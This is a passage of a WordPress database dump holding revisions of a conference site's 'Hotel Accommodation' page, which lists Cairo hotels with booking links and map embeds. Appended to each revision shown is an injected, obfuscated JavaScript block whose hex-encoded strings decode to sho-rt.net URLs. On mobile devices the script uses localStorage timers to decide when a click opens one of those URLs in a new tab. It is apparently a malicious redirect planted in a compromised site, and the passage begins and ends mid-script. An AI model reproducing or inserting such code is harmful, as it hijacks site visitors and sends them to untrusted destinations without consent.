_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 00:25:30','2023-06-24 00:25:30','',2685,'https://gsw2023.com/?p=4775',0,'revision','',0),
(4776,1,'2023-06-24 00:27:13','2023-06-24 00:27:13','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 00:27:13','2023-06-24 00:27:13','',2685,'https://gsw2023.com/?p=4776',0,'revision','',0),
(4777,1,'2023-06-24 00:27:57','2023-06-24 00:27:57','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2